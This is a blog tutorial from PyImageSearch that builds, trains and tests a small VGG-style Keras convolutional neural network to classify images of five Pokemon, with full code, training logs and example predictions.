I assume you already have Keras installed and configured on your system. If not, here are a few links to deep learning development environment configuration tutorials I have put together:

If you want to skip configuring your deep learning environment, I would recommend using one of the following pre-configured instances in the cloud:

Let’s go ahead and implement

SmallerVGGNet
 , our smaller version of VGGNet. Create a new file named
smallervggnet.py
  inside the
pyimagesearch
  module and insert the following code:
# import the necessary packages
from keras.models import Sequential
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
from keras.layers.core import Activation
from keras.layers.core import Flatten
from keras.layers.core import Dropout
from keras.layers.core import Dense
from keras import backend as K

First we import our modules — notice that they all come from Keras. Each of these are covered extensively throughout the course of reading Deep Learning for Computer Vision with Python.

Note: You’ll also want to create an

__init__.py
  file inside
pyimagesearch
  so Python knows the directory is a module. If you’re unfamiliar with
__init__.py
  files or how they are used to create modules, no worries, just use the “Downloads” section at the end of this blog post to download my directory structure, source code, and dataset + example images.

From there, we define our

SmallerVGGNet
  class:
class SmallerVGGNet:
        @staticmethod
        def build(width, height, depth, classes):
                # initialize the model along with the input shape to be
                # "channels last" and the channels dimension itself
                model = Sequential()
                inputShape = (height, width, depth)
                chanDim = -1

                # if we are using "channels first", update the input shape
                # and channels dimension
                if K.image_data_format() == "channels_first":
                        inputShape = (depth, height, width)
                        chanDim = 1

Our build method requires four parameters:

  • width
    
     : The image width dimension.
  • height
    
     : The image height dimension.
  • depth
    
     : The depth of the image — also known as the number of channels.
  • classes
    
     : The number of classes in our dataset (which will affect the last layer of our model). We’re utilizing 5 Pokemon classes in this post, but don’t forget that you could work with the 807 Pokemon species if you downloaded enough example images for each species!

Note: We’ll be working with input images that are 

96 x 96
 with a depth of
3
  (as we’ll see later in this post). Keep this in mind as we explain the spatial dimensions of the input volume as it passes through the network.

Since we’re using the TensorFlow backend, we arrange the input shape with “channels last” data ordering, but if you want to use “channels first” (Theano, etc.) then it is handled automagically on Lines 23-25.

Now, let’s start adding layers to our model:

# CONV => RELU => POOL
                model.add(Conv2D(32, (3, 3), padding="same",
                        input_shape=inputShape))
                model.add(Activation("relu"))
                model.add(BatchNormalization(axis=chanDim))
                model.add(MaxPooling2D(pool_size=(3, 3)))
                model.add(Dropout(0.25))

Above is our first 

CONV => RELU => POOL
  block.

The convolution layer has

32
  filters with a
3 x 3
  kernel. We’re using
RELU
  the activation function followed by batch normalization.

Our

POOL
  layer uses a
3 x 3
 
POOL
  size to reduce spatial dimensions quickly from
96 x 96
  to
32 x 32
 (we’ll be using  
96 x 96 x 3
 input images to train our network as we’ll see in the next section).

As you can see from the code block, we’ll also be utilizing dropout in our network architecture. Dropout works by randomly disconnecting nodes from the current layer to the next layer. This process of random disconnects during training batches helps naturally introduce redundancy into the model — no one single node in the layer is responsible for predicting a certain class, object, edge, or corner.

From there we’ll add 

(CONV => RELU) * 2
  layers before applying another
POOL
  layer:
# (CONV => RELU) * 2 => POOL
                model.add(Conv2D(64, (3, 3), padding="same",
                        input_shape=inputShape))
                model.add(Activation("relu"))
                model.add(BatchNormalization(axis=chanDim))
                model.add(Conv2D(64, (3, 3), padding="same",
                        input_shape=inputShape))
                model.add(Activation("relu"))
                model.add(BatchNormalization(axis=chanDim))
                model.add(MaxPooling2D(pool_size=(2, 2)))
                model.add(Dropout(0.25))

Stacking multiple

CONV
  and
RELU
  layers together (prior to reducing the spatial dimensions of the volume) allows us to learn a richer set of features.

Notice how:

  • We’re increasing our filter size from
    32
    
      to
    64
    
     . The deeper we go in the network, the smaller the spatial dimensions of our volume, and the more filters we learn.
  • We decreased how max pooling size from
    3 x 3
    
      to
    2 x 2
    
      to ensure we do not reduce our spatial dimensions too quickly.

Dropout is again performed at this stage.

Let’s add another set of  

(CONV => RELU) * 2 => POOL
 :
# (CONV => RELU) * 2 => POOL
                model.add(Conv2D(128, (3, 3), padding="same",
                        input_shape=inputShape))
                model.add(Activation("relu"))
                model.add(BatchNormalization(axis=chanDim))
                model.add(Conv2D(128, (3, 3), padding="same",
                        input_shape=inputShape))
                model.add(Activation("relu"))
                model.add(BatchNormalization(axis=chanDim))
                model.add(MaxPooling2D(pool_size=(2, 2)))
                model.add(Dropout(0.25))

Notice that we’ve increased our filter size to

128
  here. Dropout of 25% of the nodes is performed to reduce overfitting again.

And finally, we have a set of

FC => RELU
  layers and a softmax classifier:
# first (and only) set of FC => RELU layers
                model.add(Flatten())
                model.add(Dense(1024))
                model.add(Activation("relu"))
                model.add(BatchNormalization())
                model.add(Dropout(0.5))

                # softmax classifier
                model.add(Dense(classes))
                model.add(Activation("softmax"))

                # return the constructed network architecture
                return model

The fully connected layer is specified by

Dense(1024)
 with a rectified linear unit activation and batch normalization.

Dropout is performed a final time — this time notice that we’re dropping out 50% of the nodes during training. Typically you’ll use a dropout of 40-50% in our fully-connected layers and a dropout with much lower rate, normally 10-25% in previous layers (if any dropout is applied at all).

We round out the model with a softmax classifier that will return the predicted probabilities for each class label.

A visualization of the network architecture of first few layers of 

SmallerVGGNet
  can be seen in Figure 2 at the top of this section. To see the full resolution of our Keras CNN implementation of
SmallerVGGNet
 , refer to the following link.

Implementing our CNN + Keras training script

Now that

SmallerVGGNet
  is implemented, we can train our Convolutional Neural Network using Keras.

Open up a new file, name it

train.py
 , and insert the following code where we’ll import our required packages and libraries:
# set the matplotlib backend so figures can be saved in the background
import matplotlib
matplotlib.use("Agg")

# import the necessary packages
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam
from keras.preprocessing.image import img_to_array
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from pyimagesearch.smallervggnet import SmallerVGGNet
import matplotlib.pyplot as plt
from imutils import paths
import numpy as np
import argparse
import random
import pickle
import cv2
import os

We are going to use the

"Agg"
  matplotlib backend so that figures can be saved in the background (Line 3).

The

ImageDataGenerator
  class will be used for data augmentation, a technique used to take existing images in our dataset and apply random transformations (rotations, shearing, etc.) to generate additional training data. Data augmentation helps prevent overfitting.

Line 7 imports the

Adam
  optimizer, the optimizer method used to train our network.

The

LabelBinarizer
  (Line 9) is an important class to note — this class will enable us to:
  1. Input a set of class labels (i.e., strings representing the human-readable class labels in our dataset).
  2. Transform our class labels into one-hot encoded vectors.
  3. Allow us to take an integer class label prediction from our Keras CNN and transform it back into a human-readable label.

I often get asked hereon the PyImageSearch blog how we can transform a class label string to an integer and vice versa. Now you know the solution is to use the

LabelBinarizer
  class.

The

train_test_split
  function (Line 10) will be used to create our training and testing splits. Also take note of our
SmallerVGGNet
  import on Line 11 — this is the Keras CNN we just implemented in the previous section.

Readers of this blog are familiar with my very own imutils package. If you don’t have it installed/updated, you can install it via:

$ pip install --upgrade imutils

If you are using a Python virtual environment (as we typically do here on the PyImageSearch blog), make sure you use the

workon
  command to access your particular virtual environment before installing/upgrading
imutils
 .

From there, let’s parse our command line arguments:

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True,
        help="path to input dataset (i.e., directory of images)")
ap.add_argument("-m", "--model", required=True,
        help="path to output model")
ap.add_argument("-l", "--labelbin", required=True,
        help="path to output label binarizer")
ap.add_argument("-p", "--plot", type=str, default="plot.png",
        help="path to output accuracy/loss plot")
args = vars(ap.parse_args())

For our training script, we need to supply three required command line arguments:

  • --dataset
    
     : The path to the input dataset. Our dataset is organized in a
    dataset
    
      directory with subdirectories representing each class. Inside each subdirectory is ~250 Pokemon images. See the project directory structure at the top of this post for more details.
  • --model
    
     : The path to the output model — this training script will train the model and output it to disk.
  • --labelbin
    
     : The path to the output label binarizer — as you’ll see shortly, we’ll extract the class labels from the dataset directory names and build the label binarizer.

We also have one optional argument,

--plot
 . If you don’t specify a path/filename, then a
plot.png
  file will be placed in the current working directory.

You do not need to modify Lines 22-31 to supply new file paths. The command line arguments are handled at runtime. If this doesn’t make sense to you, be sure to review my command line arguments blog post.

Now that we’ve taken care of our command line arguments, let’s initialize some important variables:

# initialize the number of epochs to train for, initial learning rate,
# batch size, and image dimensions
EPOCHS = 100
INIT_LR = 1e-3
BS = 32
IMAGE_DIMS = (96, 96, 3)

# initialize the data and labels
data = []
labels = []

# grab the image paths and randomly shuffle them
print("[INFO] loading images...")
imagePaths = sorted(list(paths.list_images(args["dataset"])))
random.seed(42)
random.shuffle(imagePaths)

Lines 35-38 initialize important variables used when training our Keras CNN:

  • EPOCHS:
    
      The total number of epochs we will be training our network for (i.e., how many times our network “sees” each training example and learns patterns from it).
  • INIT_LR:
    
      The initial learning rate — a value of 1e-3 is the default value for the Adam optimizer, the optimizer we will be using to train the network.
  • BS:
    
      We will be passing batches of images into our network for training. There are multiple batches per epoch. The
    BS
    
      value controls the batch size.
  • IMAGE_DIMS:
    
      Here we supply the spatial dimensions of our input images. We’ll require our input images to be
    96 x 96
    
      pixels with
    3
    
      channels (i.e., RGB). I’ll also note that we specifically designed SmallerVGGNet with
    96 x 96
    
      images in mind.

We also initialize two lists —

data
  and
labels
 which will hold the preprocessed images and labels, respectively.

Lines 46-48 grab all of the image paths and randomly shuffle them.

And from there, we’ll loop over each of those

imagePaths
 :
# loop over the input images
for imagePath in imagePaths:
        # load the image, pre-process it, and store it in the data list
        image = cv2.imread(imagePath)
        image = cv2.resize(image, (IMAGE_DIMS[1], IMAGE_DIMS[0]))
        image = img_to_array(image)
        data.append(image)
 
        # extract the class label from the image path and update the
        # labels list
        label = imagePath.split(os.path.sep)[-2]
        labels.append(label)

We loop over the

imagePaths
  on Line 51 and then proceed to load the image (Line 53) and resize it to accommodate our model (Line 54).

Now it’s time to update our

data
  and
labels
  lists.

We call the Keras

img_to_array
  function to convert the image to a Keras-compatible array (Line 55) followed by appending the image to our list called
data
 (Line 56).

For our

labels
  list, we extract the
label
  from the file path on Line 60 and append it (the label) on Line 61.

So, why does this class label parsing process work?

Consider that fact that we purposely created our dataset directory structure to have the following format:

dataset/{CLASS_LABEL}/{FILENAME}.jpg

Using the path separator on Line 60 we can split the path into an array and then grab the second-to-last entry in the list — the class label.

If this process seems confusing to you, I would encourage you to open up a Python shell and explore an example

imagePath
  by splitting the path on your operating system’s respective path separator.

Let’s keep moving. A few things are happening in this next code block — additional preprocessing, binarizing labels, and partitioning the data:

# scale the raw pixel intensities to the range [0, 1]
data = np.array(data, dtype="float") / 255.0
labels = np.array(labels)
print("[INFO] data matrix: {:.2f}MB".format(
        data.nbytes / (1024 * 1000.0)))

# binarize the labels
lb = LabelBinarizer()
labels = lb.fit_transform(labels)

# partition the data into training and testing splits using 80% of
# the data for training and the remaining 20% for testing
(trainX, testX, trainY, testY) = train_test_split(data,
        labels, test_size=0.2, random_state=42)

Here we first convert the

data
  array to a NumPy array and then scale the pixel intensities to the range 
[0, 1]
  (Line 64). We also convert the
labels
  from a list to a NumPy array on Line 65. An info message is printed which shows the size (in MB) of the
data
  matrix.

Then, we binarize the labels utilizing scikit-learn’s

LabelBinarizer
  (Lines 70 and 71).

With deep learning, or any machine learning for that matter, a common practice is to make a training and testing split. This is handled on Lines 75 and 76 where we create an 80/20 random split of the data.

Next, let’s create our image data augmentation object:

# construct the image generator for data augmentation
aug = ImageDataGenerator(rotation_range=25, width_shift_range=0.1,
        height_shift_range=0.1, shear_range=0.2, zoom_range=0.2,
        horizontal_flip=True, fill_mode="nearest")

Since we’re working with a limited amount of data points (< 250 images per class), we can make use of data augmentation during the training process to give our model more images (based on existing images) to train with.

Data Augmentation is a tool that should be in every deep learning practitioner’s toolbox. I cover data augmentation in the Practitioner Bundle of Deep Learning for Computer Vision with Python.

We initialize aug, our

ImageDataGenerator
 , on Lines 79-81.

From there, let’s compile the model and kick off the training:

# initialize the model
print("[INFO] compiling model...")
model = SmallerVGGNet.build(width=IMAGE_DIMS[1], height=IMAGE_DIMS[0],
        depth=IMAGE_DIMS[2], classes=len(lb.classes_))
opt = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)
model.compile(loss="categorical_crossentropy", optimizer=opt,
        metrics=["accuracy"])

# train the network
print("[INFO] training network...")
H = model.fit_generator(
        aug.flow(trainX, trainY, batch_size=BS),
        validation_data=(testX, testY),
        steps_per_epoch=len(trainX) // BS,
        epochs=EPOCHS, verbose=1)

On Lines 85 and 86, we initialize our Keras CNN model with

96 x 96 x 3
  input spatial dimensions. I’ll state this again as I receive this question often — SmallerVGGNet was designed to accept
96 x 96 x 3
  input images. If you want to use different spatial dimensions you may need to either:
  1. Reduce the depth of the network for smaller images
  2. Increase the depth of the network for larger images

Do not go blindly editing the code. Consider the implications larger or smaller images will have first!

We’re going to use the

Adam
  optimizer with learning rate decay (Line 87) and then
compile
  our
model
  with categorical cross-entropy since we have > 2 classes (Lines 88 and 89).

Note: For only two classes you should use binary cross-entropy as the loss.

From there, we make a call to the Keras

fit_generator
  method to train the network (Lines 93-97). Be patient — this can take some time depending on whether you are training using a CPU or a GPU.

Once our Keras CNN has finished training, we’ll want to save both the (1) model and (2) label binarizer as we’ll need to load them from disk when we test the network on images outside of our training/testing set:

# save the model to disk
print("[INFO] serializing network...")
model.save(args["model"])

# save the label binarizer to disk
print("[INFO] serializing label binarizer...")
f = open(args["labelbin"], "wb")
f.write(pickle.dumps(lb))
f.close()

We serialize the model (Line 101) and the label binarizer (Lines 105-107) so we can easily use them later in our

classify.py
  script.

The label binarizer file contains the class index to human-readable class label dictionary. This object ensures we don’t have to hardcode our class labels in scripts that wish to use our Keras CNN.

Finally, we can plot our training and loss accuracy:

# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
N = EPOCHS
plt.plot(np.arange(0, N), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, N), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, N), H.history["acc"], label="train_acc")
plt.plot(np.arange(0, N), H.history["val_acc"], label="val_acc")
plt.title("Training Loss and Accuracy")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="upper left")
plt.savefig(args["plot"])

I elected to save my plot to disk (Line 121) rather than displaying it for two reasons: (1) I’m on a headless server in the cloud and (2) I wanted to make sure I don’t forget to save the plot.

Training our CNN with Keras

Now we’re ready to train our Pokedex CNN.

Be sure to visit the “Downloads” section of this blog post to download code + data.

Then execute the following command to train the mode; while making sure to provide the command line arguments properly:

$ $ python train.py --dataset dataset --model pokedex.model --labelbin lb.pickle
Using TensorFlow backend.
[INFO] loading images...
[INFO] data matrix: 252.07MB
[INFO] compiling model...
[INFO] training network...
name: GeForce GTX TITAN X
major: 5 minor: 2 memoryClockRate (GHz) 1.076
pciBusID 0000:09:00.0
Total memory: 11.92GiB
Free memory: 11.71GiB
Epoch 1/100
29/29 [==============================] - 2s - loss: 1.4015 - acc: 0.6088 - val_loss: 1.8745 - val_acc: 0.2134
Epoch 2/100
29/29 [==============================] - 1s - loss: 0.8578 - acc: 0.7285 - val_loss: 1.4539 - val_acc: 0.2971
Epoch 3/100
29/29 [==============================] - 1s - loss: 0.7370 - acc: 0.7809 - val_loss: 2.5955 - val_acc: 0.2008
...
Epoch 98/100
29/29 [==============================] - 1s - loss: 0.0833 - acc: 0.9702 - val_loss: 0.2064 - val_acc: 0.9540
Epoch 99/100
29/29 [==============================] - 1s - loss: 0.0678 - acc: 0.9727 - val_loss: 0.2299 - val_acc: 0.9456
Epoch 100/100
29/29 [==============================] - 1s - loss: 0.0890 - acc: 0.9684 - val_loss: 0.1955 - val_acc: 0.9707
[INFO] serializing network...
[INFO] serializing label binarizer...

Looking at the output of our training script we see that our Keras CNN obtained:

  • 96.84% classification accuracy on the training set
  • And 97.07% accuracy on the testing set

The training loss/accuracy plot follows:

Figure 3: Training and validation loss/accuracy plot for a Pokedex deep learning classifier trained with Keras.

As you can see in Figure 3, I trained the model for 100 epochs and achieved low loss with limited overfitting. With additional training data we could obtain higher accuracy as well.

Creating our CNN and Keras testing script

Now that our CNN is trained, we need to implement a script to classify images that are not part of our training or validation/testing set. Open up a new file, name it

classify.py
 , and insert the following code:
# import the necessary packages
from keras.preprocessing.image import img_to_array
from keras.models import load_model
import numpy as np
import argparse
import imutils
import pickle
import cv2
import os

First we import the necessary packages (Lines 2-9).

From there, let’s parse command line arguments:

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-m", "--model", required=True,
        help="path to trained model model")
ap.add_argument("-l", "--labelbin", required=True,
        help="path to label binarizer")
ap.add_argument("-i", "--image", required=True,
        help="path to input image")
args = vars(ap.parse_args())

We’ve have three required command line arguments we need to parse:

  • --model
    
     : The path to the model that we just trained.
  • --labelbin
    
     : The path to the label binarizer file.
  • --image
    
     : Our input image file path.

Each of these arguments is established and parsed on Lines 12-19. Remember, you don’t need to modify these lines — I’ll show you how to run the program in the next section using the command line arguments provided at runtime.

Next, we’ll load and preprocess the image:

# load the image
image = cv2.imread(args["image"])
output = image.copy()
 
# pre-process the image for classification
image = cv2.resize(image, (96, 96))
image = image.astype("float") / 255.0
image = img_to_array(image)
image = np.expand_dims(image, axis=0)

Here we load the input 

image
  (Line 22) and make a copy called
output
  for display purposes (Line 23).

Then we preprocess the

image
  in the exact same manner that we did for training (Lines 26-29).

From there, let’s load the model + label binarizer and then classify the image:

# load the trained convolutional neural network and the label
# binarizer
print("[INFO] loading network...")
model = load_model(args["model"])
lb = pickle.loads(open(args["labelbin"], "rb").read())

# classify the input image
print("[INFO] classifying image...")
proba = model.predict(image)[0]
idx = np.argmax(proba)
label = lb.classes_[idx]

In order to classify the image, we need the

model
  and label binarizer in memory. We load both on Lines 34 and 35.

Subsequently, we classify the

image
  and create the
label
  (Lines 39-41).

The remaining code block is for display purposes:

# we'll mark our prediction as "correct" of the input image filename
# contains the predicted label text (obviously this makes the
# assumption that you have named your testing image files this way)
filename = args["image"][args["image"].rfind(os.path.sep) + 1:]
correct = "correct" if filename.rfind(label) != -1 else "incorrect"

# build the label and draw the label on the image
label = "{}: {:.2f}% ({})".format(label, proba[idx] * 100, correct)
output = imutils.resize(output, width=400)
cv2.putText(output, label, (10, 25),  cv2.FONT_HERSHEY_SIMPLEX,
        0.7, (0, 255, 0), 2)

# show the output image
print("[INFO] {}".format(label))
cv2.imshow("Output", output)
cv2.waitKey(0)

On Lines 46 and 47, we’re extracting the name of the Pokemon from the

filename
  and comparing it to the
label
 . The
correct
  variable will be either
"correct"
  or
"incorrect"
  based on this. Obviously these two lines make the assumption that your input image has a filename that contains the true label.

From there we take the following steps:

  1. Append the probability percentage and
    "correct"
    
     /
    "incorrect"
    
      text to the class 
    label
    
      (Line 50).
  2. Resize the
    output
    
      image so it fits our screen (Line 51).
  3. Draw the
    label
    
      text on the
    output
    
      image (Lines 52 and 53).
  4. Display the
    output
    
      image and wait for a keypress to exit (Lines 57 and 58).

Classifying images with our CNN and Keras

We’re now ready to run the

classify.py
  script!

Ensure that you’ve grabbed the code + images from the “Downloads” section at the bottom of this post.

Once you’ve downloaded and unzipped the archive change into the root directory of this project and follow along starting with an image of Charmander. Notice that we’ve provided three command line arguments in order to run the script:

$ python classify.py --model pokedex.model --labelbin lb.pickle \
        --image examples/charmander_counter.png
Using TensorFlow backend.
[INFO] loading network...
[INFO] classifying image...
[INFO] charmander: 99.77% (correct)

Figure 4: Correctly classifying an input image using Keras and Convolutional Neural Networks.

And now let’s query our model with the loyal and fierce Bulbasaur stuffed Pokemon:

$ python classify.py --model pokedex.model --labelbin lb.pickle \
        --image examples/bulbasaur_plush.png
Using TensorFlow backend.
[INFO] loading network...
[INFO] classifying image...
[INFO] bulbasaur: 99.35% (correct)

Figure 5: Again, our Keras deep learning image classifier is able to correctly classify the input image [image source]

Let’s try a toy action figure of Mewtwo (a genetically engineered Pokemon):
$ python classify.py --model pokedex.model --labelbin lb.pickle \
        --image examples/mewtwo_toy.png
Using TensorFlow backend.
[INFO] loading network...
[INFO] classifying image...
[INFO] mewtwo: 100.00% (correct)

Figure 6: Using Keras, deep learning, and Python we are able to correctly classify the input image using our CNN. [image source]

What would an example Pokedex be if it couldn’t recognize the infamous Pikachu:
$ python classify.py --model pokedex.model --labelbin lb.pickle \
        --image examples/pikachu_toy.png
Using TensorFlow backend.
[INFO] loading network...
[INFO] classifying image...
[INFO] pikachu: 99.58% (correct)

Figure 7: Using our Keras model we can recognize the iconic Pikachu Pokemon. [image source]

Let’s try the cute Squirtle Pokemon:
$ python classify.py --model pokedex.model --labelbin lb.pickle \
        --image examples/squirtle_plush.png
Using TensorFlow backend.
[INFO] loading network...
[INFO] classifying image...
[INFO] squirtle: 98.62% (correct)

Figure 8: Correctly classifying image data using Keras and a CNN. [image source]

And last but not least, let’s classify my fire-tailed Charmander again. This time he is being shy and is partially occluded by my monitor.
$ python classify.py --model pokedex.model --labelbin lb.pickle \
        --image examples/charmander_hidden.png
Using TensorFlow backend.
[INFO] loading network...
[INFO] classifying image...
[INFO] charmander: 59.82% (correct)

Figure 9: One final example of correctly classifying an input image using Keras and Convolutional Neural Networks (CNNs).

Each of these Pokemons were no match for my new Pokedex.

Currently, there are around 807 different species of Pokemon. Our classifier was trained on only five different Pokemon (for the sake of simplicity).

If you’re looking to train a classifier to recognize more Pokemon for a bigger Pokedex, you’ll need additional training images for each classIdeally, your goal should be to have 500-1,000 images per class you wish to recognize.

To acquire training images, I suggest that you look no further than Microsoft Bing’s Image Search API. This API is hands down easier to use than the previous hack of Google Image Search that I shared (but that would work too).

Limitations of this model

One of the primary limitations of this model is the small amount of training data. I tested on various images and at times the classifications were incorrect. When this happened, I examined the input image + network more closely and found that the color(s) most dominant in the image influence the classification dramatically.

For example, lots of red and oranges in an image will likely return “Charmander” as the label. Similarly, lots of yellows in an image will normally result in a “Pikachu” label.

This is partially due to our input data. Pokemon are obviously fictitious so there no actual “real-world” images of them (other than the action figures and toy plushes).

Most of our images came from either fan illustrations or stills from the movie/TV show. And furthermore, we only had a limited amount of data for each class (~225-250 images).

Ideally, we should have at least 500-1,000 images per class when training a Convolutional Neural Network. Keep this in mind when working with your own data.

Can we use this Keras deep learning model as a REST API?

If you would like to run this model (or any other deep learning model) as a REST API, I wrote three blog posts to help you get started:

  1. Building a simple Keras + deep learning REST API (Keras.io guest post)
  2. A scalable Keras + deep learning REST API
  3. Deep learning in production with Keras, Redis, Flask, and Apache

Summary

In today’s blog post you learned how to train a Convolutional Neural Network (CNN) using the Keras deep learning library.

Our dataset was gathered using the procedure discussed in last week’s blog post.

In particular, our dataset consists of 1,191 images of five separate Pokemon (animal-like creatures that exist in the world of Pokemon, the popular TV show, video game, and trading card series).

Using our Convolutional Neural Network and Keras, we were able to obtain 97.07% accuracy, which is quite respectable given (1) the limited size of our dataset and (2) the number of parameters in our network.

In next week’s blog post I’ll be demonstrating how we can:

  1. Take our trained Keras + Convolutional Neural Network model…
  2. …and deploy it to a smartphone with only a few lines of code!

It’s going to be a great post, don’t miss it!

To download the source code to this post (and be notified when next week’s can’t miss post goes live), just enter your email address in the form below!

Downloads:

If you would like to download the code and images used in this post, please enter your email address in the form below. Not only will you get a .zip of the code, I’ll also send you a FREE 11-page Resource Guide on Computer Vision and Image Search Engines, including exclusive techniques that I don’t post on this blog! Sound good? If so, enter your email address and I’ll send you the code immediately!

The post Keras and Convolutional Neural Networks (CNNs) appeared first on PyImageSearch.



from PyImageSearch https://ift.tt/2JMPzfv
via IFTTT